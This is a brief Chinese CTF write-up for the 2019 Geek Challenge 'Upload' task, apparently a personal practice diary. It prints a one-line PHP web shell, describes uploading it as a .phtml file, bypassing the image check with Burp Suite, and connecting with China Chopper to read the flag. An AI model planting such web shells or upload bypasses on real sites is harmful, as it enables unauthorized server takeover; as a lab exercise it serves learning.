[极客大挑战 2019]Upload–个人写题日记
打开靶机,可以看到这是一个让我们上传图片的界面
在这里,我们可以试着上传一句话木马,打开文本编辑器,输入代码
<script language="php">eval($_POST['shell']);</script>
用phtml的格式上传。.phtml格式的文件是php和html结合的网页文件。
改文件后缀名
进入靶机,上传木马文件,发现不能上传成功,此时说该文件不是image。所以我们需要改文件格式,可以使用burpsuit抓包,更改文件格式。上传成功后,猜测木马文件应该在upload文件夹下
使用中国菜刀链接靶机
使用文件管理功能,最终发现flag在根目录下
打开flag文件,得到flag